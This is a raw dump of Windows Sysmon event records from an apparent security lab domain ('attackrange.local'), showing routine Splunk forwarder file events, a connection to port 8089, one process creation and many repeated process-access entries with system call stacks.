23542300x8000000000000000107043Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:57.025{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=155D8BCA385D097EEC4FFB8520AF52E5,SHA256=7D4DC1133F649F758A069D6275BDAB2EDE8A49E5ECD6AA47B60A7872EBC4EF21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107042Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:57.009{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083264Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:00:58.250{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF51E774EF60CBD9F26622C0B241515D,SHA256=E353BD08DB92713CC487A8D177678D199DCB97823472900C6842292A94EA5187,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107082Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:57.235{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51869-false10.0.1.12-8089- 10341000x8000000000000000107081Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4BA-615A-4A02-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107080Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107079Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107078Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107077Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107076Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B4BA-615A-4A02-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107075Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.608{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4BA-615A-4A02-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107074Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.609{58E9C193-B4BA-615A-4A02-00000000FC01}8152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000107073Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107072Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107071Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107070Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107069Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107068Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107067Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107066Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107065Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107064Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107063Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107062Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107061Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107060Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107059Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107058Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107057Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107056Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107055Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107054Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:58.393{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107053Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 